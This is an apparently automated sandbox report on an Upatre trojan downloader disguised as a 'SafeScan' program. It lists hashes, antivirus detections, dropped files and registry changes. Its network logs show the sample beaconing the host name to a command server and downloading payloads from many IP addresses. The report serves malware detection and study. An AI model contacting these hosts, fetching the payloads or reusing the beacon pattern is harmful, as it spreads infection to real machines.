Analysis Date2015-12-05 15:57:58
MD5a98e80bc628530f1e55aca175fec85e2
SHA123911d32edcd86f26471fa63d874ddc86d11b412

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 338b28f6491de57e43e54d029062a328 sha1: 02dd861ddd6c0023cbdc588e62a0456009b8eadb size: 48128
Section.rdata md5: 8f04549995ca607f0fe9133713caddda sha1: 1f13d939113181c9694b3700b4673e926ac6dd2e size: 31744
Section.data md5: 3ea6f7b141f1573448b51afed5e92880 sha1: 67cf7fac5617fb79cf0da683afc182f974b02188 size: 7168
Section.rsrc md5: 737e636a64cf5c569b3169cce59a28ae sha1: f899dc6e9d6eacafe704540310ad2ea6f25f7963 size: 23552
Timestamp2014-07-18 19:29:01
VersionLegalCopyright:
InternalName:
FileVersion: 2.3.0.91
CompanyName: Safe-soft
LegalTrademarks:
ProductName: SafeScan
ProductVersion: 3.91
FileDescription:
OriginalFilename:
PackerVC8 -> Microsoft Corporation
PEhash3ae867e4b4bd1d7707f3a598c2f5e7cce352e348
IMPhashfb205081ca935568918c6c78c3c5e54a
AVKasperskyTrojan-Downloader.Win32.Upatre.chbm
AVRisingTrojan.Win32.Kryptik.ae
AVF-SecureTrojan.Upatre.Gen.3
AVKasperskyTrojan-Downloader.Win32.Upatre.chbm
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre
AVMicroWorld (escan)Trojan.Upatre.Gen.3
AVFortinetW32/Generic.AC.1792298
AVFrisk (f-prot)W32/Upatre.DM.gen!Eldorado
AVIkarusTrojan-Downloader.Win32.Waski
AVK7Trojan ( 004c75411 )
AVMcafeeUpatre-FACH!A98E80BC6285
AVMcafeeUpatre-FACH!A98E80BC6285
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Upatre
AVMicroWorld (escan)Trojan.Upatre.Gen.3
AVEset (nod32)Win32/Kryptik.DNJD
AVEset (nod32)Win32/Kryptik.DNJD
AVFortinetW32/Generic.AC.1792298
AVFrisk (f-prot)W32/Upatre.DM.gen!Eldorado
AVF-SecureTrojan.Upatre.Gen.3
AVGrisoft (avg)Generic_s.EVP
AVIkarusTrojan-Downloader.Win32.Waski
AVK7Trojan ( 004c75411 )
AVMalwareBytesTrojan.Upatre
AVMalwareBytesTrojan.Upatre
AVAd-AwareTrojan.Upatre.Gen.3
AVBullGuardTrojan.Upatre.Gen.3
AVBullGuardTrojan.Upatre.Gen.3
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAuthentiumW32/Upatre.DM.gen!Eldorado
AVCA (E-Trust Ino)no_virus
AVCA (E-Trust Ino)no_virus
AVAuthentiumW32/Upatre.DM.gen!Eldorado
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVCAT (quickheal)TrojanDwnLdr.Upatre.A3
AVCAT (quickheal)TrojanDwnLdr.Upatre.A3
AVAd-AwareTrojan.Upatre.Gen.3
AVAvira (antivir)TR/Crypt.ZPACK.64254
AVClamAVno_virus
AVClamAVno_virus
AVAvira (antivir)TR/Crypt.ZPACK.64254
AVGrisoft (avg)Generic_s.EVP
AVDr. WebTrojan.DownLoader14.46865
AVDr. WebTrojan.DownLoader14.46865
AVArcabit (arcavir)Trojan.Upatre.Gen.3
AVBitDefenderTrojan.Upatre.Gen.3
AVEmsisoftTrojan.Upatre.Gen.3
AVEmsisoftTrojan.Upatre.Gen.3
AVBitDefenderTrojan.Upatre.Gen.3
AVRisingTrojan.Win32.Kryptik.ae
AVArcabit (arcavir)Trojan.Upatre.Gen.3

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\yaxkodila.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\yaxkodila.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\yaxkodila.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\icanhazip[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS72.230.82.80
Winsock DNS93.93.194.202
Winsock DNS188.255.165.154
Winsock DNS173.248.29.43
Winsock DNS64.203.121.6
Winsock DNS109.86.226.85
Winsock DNS176.36.251.208
Winsock DNSicanhazip.com
Winsock DNS188.255.169.176
Winsock DNS104.174.123.66
Winsock DNS173.216.240.56
Winsock DNS69.163.81.211
Winsock DNS216.254.231.11
Winsock DNS24.220.92.193
Winsock DNS68.190.246.142
Winsock DNS75.137.112.81
Winsock DNS24.33.131.116

Network Details:

DNSicanhazip.com
Type: A
64.182.208.185
DNSicanhazip.com
Type: A
64.182.208.184
HTTP GEThttp://icanhazip.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/0/51-SP3/0/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://176.36.251.208:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/4/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://188.255.165.154:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/5/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://173.216.240.56:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://68.190.246.142:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/7/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://188.255.169.176:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/8/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://75.137.112.81:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/9/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://69.163.81.211:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://216.254.231.11:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://24.33.131.116:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://104.174.123.66:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://72.230.82.80:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://64.203.121.6:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://173.248.29.43:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://109.86.226.85:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/2/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://24.220.92.193:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://176.36.251.208:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/4/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://188.255.165.154:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/5/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://173.216.240.56:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://68.190.246.142:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/7/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://188.255.169.176:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/8/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://75.137.112.81:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/9/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://69.163.81.211:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://216.254.231.11:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://24.33.131.116:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://104.174.123.66:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://72.230.82.80:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://64.203.121.6:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://173.248.29.43:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://109.86.226.85:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/2/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://24.220.92.193:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/3/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://176.36.251.208:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/4/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://188.255.165.154:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/5/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://173.216.240.56:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/6/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://68.190.246.142:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/7/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://188.255.169.176:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/8/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://75.137.112.81:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/9/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://69.163.81.211:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://216.254.231.11:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://24.33.131.116:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://104.174.123.66:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://72.230.82.80:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://64.203.121.6:198/pict12.png
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
HTTP GEThttp://93.93.194.202:13241/FOLD12/COMPUTER-XXXXXX/41/2/1/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.34 (KHTML, like Gecko) Chrome/43.0.2457.82 Safari/537.34
Flows TCP192.168.1.1:1031 ➝ 64.182.208.185:80
Flows TCP192.168.1.1:1032 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1033 ➝ 176.36.251.208:198
Flows TCP192.168.1.1:1034 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1035 ➝ 188.255.165.154:198
Flows TCP192.168.1.1:1036 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1037 ➝ 173.216.240.56:198
Flows TCP192.168.1.1:1038 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1039 ➝ 68.190.246.142:198
Flows TCP192.168.1.1:1040 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1041 ➝ 188.255.169.176:198
Flows TCP192.168.1.1:1042 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1043 ➝ 75.137.112.81:198
Flows TCP192.168.1.1:1044 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1045 ➝ 69.163.81.211:198
Flows TCP192.168.1.1:1046 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1047 ➝ 216.254.231.11:198
Flows TCP192.168.1.1:1048 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1049 ➝ 24.33.131.116:198
Flows TCP192.168.1.1:1050 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1051 ➝ 104.174.123.66:198
Flows TCP192.168.1.1:1052 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1053 ➝ 72.230.82.80:198
Flows TCP192.168.1.1:1054 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1055 ➝ 64.203.121.6:198
Flows TCP192.168.1.1:1056 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1057 ➝ 173.248.29.43:198
Flows TCP192.168.1.1:1058 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1059 ➝ 109.86.226.85:198
Flows TCP192.168.1.1:1060 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1061 ➝ 24.220.92.193:198
Flows TCP192.168.1.1:1062 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1063 ➝ 176.36.251.208:198
Flows TCP192.168.1.1:1064 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1065 ➝ 188.255.165.154:198
Flows TCP192.168.1.1:1066 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1067 ➝ 173.216.240.56:198
Flows TCP192.168.1.1:1068 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1069 ➝ 68.190.246.142:198
Flows TCP192.168.1.1:1070 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1071 ➝ 188.255.169.176:198
Flows TCP192.168.1.1:1072 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1073 ➝ 75.137.112.81:198
Flows TCP192.168.1.1:1074 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1075 ➝ 69.163.81.211:198
Flows TCP192.168.1.1:1076 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1077 ➝ 216.254.231.11:198
Flows TCP192.168.1.1:1078 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1079 ➝ 24.33.131.116:198
Flows TCP192.168.1.1:1080 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1081 ➝ 104.174.123.66:198
Flows TCP192.168.1.1:1082 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1083 ➝ 72.230.82.80:198
Flows TCP192.168.1.1:1084 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1085 ➝ 64.203.121.6:198
Flows TCP192.168.1.1:1086 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1087 ➝ 173.248.29.43:198
Flows TCP192.168.1.1:1088 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1089 ➝ 109.86.226.85:198
Flows TCP192.168.1.1:1090 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1091 ➝ 24.220.92.193:198
Flows TCP192.168.1.1:1092 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1093 ➝ 176.36.251.208:198
Flows TCP192.168.1.1:1094 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1095 ➝ 188.255.165.154:198
Flows TCP192.168.1.1:1096 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1097 ➝ 173.216.240.56:198
Flows TCP192.168.1.1:1098 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1099 ➝ 68.190.246.142:198
Flows TCP192.168.1.1:1100 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1101 ➝ 188.255.169.176:198
Flows TCP192.168.1.1:1102 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1103 ➝ 75.137.112.81:198
Flows TCP192.168.1.1:1104 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1105 ➝ 69.163.81.211:198
Flows TCP192.168.1.1:1106 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1107 ➝ 216.254.231.11:198
Flows TCP192.168.1.1:1108 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1109 ➝ 24.33.131.116:198
Flows TCP192.168.1.1:1110 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1111 ➝ 104.174.123.66:198
Flows TCP192.168.1.1:1112 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1113 ➝ 72.230.82.80:198
Flows TCP192.168.1.1:1114 ➝ 93.93.194.202:13241
Flows TCP192.168.1.1:1115 ➝ 64.203.121.6:198
Flows TCP192.168.1.1:1116 ➝ 93.93.194.202:13241

Raw Pcap

Strings